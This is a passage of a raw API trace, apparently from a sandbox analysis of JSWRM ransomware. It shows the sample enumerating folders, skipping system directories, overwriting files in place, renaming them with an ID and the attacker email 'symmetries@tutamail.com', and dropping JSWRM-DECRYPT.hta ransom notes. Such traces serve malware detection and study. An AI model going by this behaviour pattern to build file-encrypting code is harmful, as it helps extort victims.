(HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0058.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0058.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0058.585] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.586] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=74214) returned 1 [0058.586] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x121e0) returned 0x2471a8 [0058.586] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x121e0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x121e0, lpOverlapped=0x0) returned 1 [0058.636] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.637] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x121e0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x121e0, lpOverlapped=0x0) returned 1 [0058.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.639] CloseHandle (hObject=0x3d4) returned 1 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0058.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0058.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0058.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0058.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.652] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0058.653] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.653] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0058.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0058.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.653] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.654] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0058.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0058.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.654] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1028", cAlternateFileName="")) returned 1 [0058.654] lstrcmpiW (lpString1="1028", lpString2=".") returned 1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="..") returned 1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="...") returned 1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="windows") returned -1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="recovery") returned -1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="perflogs") returned -1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="documents and settings") returned -1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="$RECYCLE.BIN") returned 1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="system volume information") returned -1 [0058.654] lstrcmpiW (lpString1="1028", lpString2="msocache") returned -1 [0058.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0058.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226930 [0058.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.654] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1028\\jswrm-decrypt.hta")) returned 0xffffffff [0058.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226930 | out: hHeap=0x1e0000) returned 1 [0058.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0058.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226130 [0058.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0058.656] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1028\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.658] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.658] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.659] CloseHandle (hObject=0x450) returned 1 [0058.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226130 | out: hHeap=0x1e0000) returned 1 [0058.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0058.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226930 [0058.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0058.659] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1028\\jswrm-decrypt.hta")) returned 0x20 [0058.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226930 | out: hHeap=0x1e0000) returned 1 [0058.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0058.660] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x199fe904, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0058.660] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.660] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x199fe904, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.660] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.660] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.660] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.660] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0058.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0058.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0058.661] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.661] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=6309) returned 1 [0058.661] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18a0) returned 0x23dc88 [0058.661] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x18a0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x18a0, lpOverlapped=0x0) returned 1 [0058.663] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.663] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x18a0, lpOverlapped=0x0) returned 1 [0058.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.663] CloseHandle (hObject=0x3d4) returned 1 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0058.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0058.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.664] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0058.665] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x199fe904, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x199fe904, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x199fe904, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.665] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.665] 